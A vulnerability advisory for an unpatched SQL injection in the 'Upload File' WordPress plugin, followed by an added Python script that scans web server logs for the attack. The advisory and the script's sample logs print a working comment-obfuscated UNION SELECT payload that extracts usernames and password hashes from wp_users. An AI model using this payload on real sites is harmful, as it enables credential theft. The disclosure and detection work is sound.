New Advisory:
WordPress Plugin Upload File (UP) Remote SQL Injection


--------------------Summary----------------
Software: Upload File (WordPress Plugin)
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available
Solution: Not Available
Discovered by: eserg.ru

-----------------Description---------------
1. SQL Injection.

http://localhost/[path]/wp-uploadfile.php?f_id=[SQL]
SQL query:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*

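Since no patch is available, the practical defensive step is to watch the web server logs for out-of-spec values of the f_id parameter. The script below is an added example written for this advisory, not code from the plugin or from the Belsec Team: it parses combined-format access log lines (the log lines and the "/blog/" install directory are constructed for the example), treats f_id on wp-uploadfile.php as an integer-only parameter, and for any non-integer value undoes the obfuscations used in the advisory's payload (percent-encoding, /**/ comments standing in for spaces, mixed case) so the reviewer sees the decoded statement and the SQL keywords in it. Validating against the expected shape (a plain integer) rather than a keyword blacklist is what keeps the check from being bypassed by other comment or encoding tricks.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (combined log format). The "/blog/"
# directory is a placeholder for the real install path, which the advisory
# leaves as [path].
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2008:10:00:01 +0000] "GET /blog/wp-uploadfile.php?f_id=12 HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2008:10:00:02 +0000] "GET /blog/wp-uploadfile.php?f_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* HTTP/1.1" 200 2048
192.0.2.12 - - [01/Jan/2008:10:00:03 +0000] "GET /blog/wp-uploadfile.php?f_id=7%20UNION%20SELECT%201,2 HTTP/1.1" 200 1024
192.0.2.13 - - [01/Jan/2008:10:00:04 +0000] "GET /blog/index.php?p=3 HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Script basename -> parameters that must be plain integers. f_id is the
# parameter named in the advisory; other scripts are left alone.
NUMERIC_PARAMS = {"wp-uploadfile.php": {"f_id"}}

SQL_KEYWORDS = re.compile(
    r"\b(union|select|from|concat|where|insert|update|delete)\b", re.I
)


def normalize(value):
    """Undo the obfuscations seen in the advisory payload so an analyst can
    read the injected statement: percent-encoding, inline /**/ comments used
    in place of spaces, a trailing unterminated /* comment, case and
    repeated whitespace."""
    v = unquote_plus(value)
    v = re.sub(r"/\*.*?\*/", " ", v)   # /**/ used as a space
    v = re.sub(r"/\*.*$", " ", v)      # trailing /* that comments out the rest
    return re.sub(r"\s+", " ", v).strip().lower()


def analyze_request(target):
    """Return a finding dict for one request target, or None if every
    watched parameter has the integer shape the script expects."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    watched = NUMERIC_PARAMS.get(script)
    if not watched:
        return None
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for raw in values:
            if re.fullmatch(r"\d+", raw):
                continue           # in spec: a plain integer id
            norm = normalize(raw)
            return {
                "script": script,
                "param": name,
                "raw": raw,
                "normalized": norm,
                "sql_keywords": sorted({k.lower() for k in SQL_KEYWORDS.findall(norm)}),
            }
    return None


def analyze_log(text):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        finding = analyze_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['script']} {f['param']}={f['normalized']!r} "
              f"keywords={f['sql_keywords']}")
```

Run against the constructed log, the script reports the two requests whose f_id is not an integer and decodes the comment-obfuscated payload into a readable UNION SELECT against wp_users, while the legitimate f_id=12 request and the unrelated index.php request produce nothing.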
--------------PoC/Exploit----------------------
Waiting for developer(s) reply.

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Regards,
Belsec Team
http://eserg.ru